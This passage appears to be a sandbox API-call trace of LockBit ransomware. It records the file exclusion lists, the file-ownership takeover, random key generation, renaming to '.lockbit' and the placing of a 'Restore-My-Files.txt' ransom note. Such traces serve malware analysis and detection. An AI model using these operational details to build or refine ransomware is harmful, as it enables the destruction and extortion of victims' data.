[0085.843] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0085.844] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0085.844] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0085.844] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0085.844] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0085.844] RtlFreeAnsiString (AnsiString="\\") [0085.844] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c0) returned 0x0 [0085.844] malloc (_Size=0x200) returned 0x77d800 [0085.844] NtQueryInformationToken (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0085.845] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.845] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.845] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.845] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.845] CloseHandle (hObject=0x3c0) returned 1 [0085.845] free (_Block=0x77d800) [0085.846] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0085.846] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.846] malloc (_Size=0x40068) returned 0x3d70048 [0085.846] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=3118) returned 1 [0085.846] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.847] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.847] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0085.847] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.847] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.847] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0085.847] ReadFile (in: hFile=0x3c0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0085.853] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0085.853] malloc (_Size=0xe4) returned 0x1ff1e60 [0085.853] NtSetInformationFile (FileHandle=0x3c0, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xe4, FileInformationClass=0xa) returned 0x0 [0085.853] free (_Block=0x1ff1e60) [0085.853] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationRight_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles") returned 1 [0085.853] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\Restore-My-Files.txt") returned 76 [0085.854] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.854] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f9ee2bd, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f9ee2bd, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ef0b3a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0085.854] lstrcmpiW (lpString1=".", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0085.854] lstrcmpiW (lpString1="..", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0085.854] PathFindExtensionW (pszPath="NavigationUp_ButtonGraphic.png") returned=".png" [0085.854] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0085.854] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0085.854] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0085.854] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0085.854] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0085.854] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0085.854] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0085.854] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0085.854] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0085.854] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0085.854] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0085.854] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0085.854] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0085.854] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0085.854] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0085.854] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0085.854] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0085.854] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0085.854] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0085.854] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0085.854] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0085.855] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0085.855] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0085.855] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0085.855] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.855] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0085.855] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0085.855] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0085.855] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0085.855] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0085.855] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0085.855] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0085.855] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0085.855] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0085.855] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0085.855] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0085.855] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0085.855] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0085.855] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0085.855] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0085.855] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0085.855] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0085.855] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.855] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0085.855] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0085.855] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0085.855] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0085.855] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0085.855] lstrcmpiW (lpString1="ntldr", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0085.856] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0085.856] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0085.856] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0085.856] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationUp_ButtonGraphic.png") returned 1 [0085.856] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationUp_ButtonGraphic.png") returned -1 [0085.856] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\") returned="" [0085.856] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_ButtonGraphic.png") returned=".png" [0085.856] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0085.856] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0085.856] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0085.856] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0085.856] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0085.856] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0085.856] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0085.856] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0085.856] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0085.856] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0085.856] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0085.856] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0085.856] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0085.856] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0085.856] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0085.856] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0085.856] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0085.856] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0085.856] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0085.856] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0085.856] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0085.856] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0085.856] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0085.857] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0085.857] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0085.857] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0085.857] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0085.857] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0085.857] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_ButtonGraphic.png.lockbit") returned 94 [0085.857] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.857] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0085.857] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0085.857] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0085.858] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0085.858] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0085.858] RtlFreeAnsiString (AnsiString="\\") [0085.858] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0085.858] malloc (_Size=0x200) returned 0x77d800 [0085.858] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0085.858] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.858] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.858] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.858] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.859] CloseHandle (hObject=0x3b8) returned 1 [0085.859] free (_Block=0x77d800) [0085.859] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0085.859] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.859] malloc (_Size=0x40068) returned 0x1fb18c0 [0085.859] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=4955) returned 1 [0085.859] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.859] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.860] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0085.860] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.860] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.860] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0085.860] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0085.864] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0085.864] malloc (_Size=0xd2) returned 0x1ff1e60 [0085.864] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xd2, FileInformationClass=0xa) returned 0x0 [0085.866] free (_Block=0x1ff1e60) [0085.866] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles") returned 1 [0085.866] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\Restore-My-Files.txt") returned 76 [0085.866] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.866] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fa3a577, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6fa3a577, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ef0b3a7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0085.866] lstrcmpiW (lpString1=".", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0085.866] lstrcmpiW (lpString1="..", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0085.866] PathFindExtensionW (pszPath="NavigationUp_SelectionSubpicture.png") returned=".png" [0085.866] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0085.867] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0085.867] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0085.867] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0085.867] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0085.867] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0085.867] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0085.867] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0085.867] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0085.867] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0085.867] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0085.867] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0085.867] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0085.867] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0085.867] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0085.867] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0085.867] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0085.867] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0085.867] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0085.867] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0085.867] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0085.867] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0085.867] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0085.867] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0085.867] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.867] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0085.867] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0085.868] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0085.868] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0085.868] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0085.868] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0085.868] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0085.868] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0085.868] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0085.868] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0085.868] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0085.868] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0085.868] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0085.868] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0085.868] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0085.868] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0085.868] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0085.868] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.868] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0085.868] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0085.868] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0085.868] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0085.868] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0085.868] lstrcmpiW (lpString1="ntldr", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0085.868] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0085.868] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0085.868] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0085.868] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0085.868] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0085.869] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\") returned="" [0085.869] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_SelectionSubpicture.png") returned=".png" [0085.869] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0085.869] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0085.869] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0085.869] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0085.869] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0085.869] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0085.869] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0085.869] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0085.869] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0085.869] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0085.869] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0085.869] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0085.869] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0085.869] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0085.869] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0085.869] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0085.869] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0085.869] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0085.869] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0085.869] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0085.869] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0085.869] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0085.869] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0085.869] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0085.869] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0085.870] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0085.870] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0085.870] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0085.870] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_SelectionSubpicture.png.lockbit") returned 100 [0085.870] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.870] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0085.870] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0085.870] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0085.871] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0085.871] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0085.871] RtlFreeAnsiString (AnsiString="\\") [0085.871] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3ac) returned 0x0 [0085.871] malloc (_Size=0x200) returned 0x77d800 [0085.871] NtQueryInformationToken (in: TokenHandle=0x3ac, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0085.871] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.871] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, 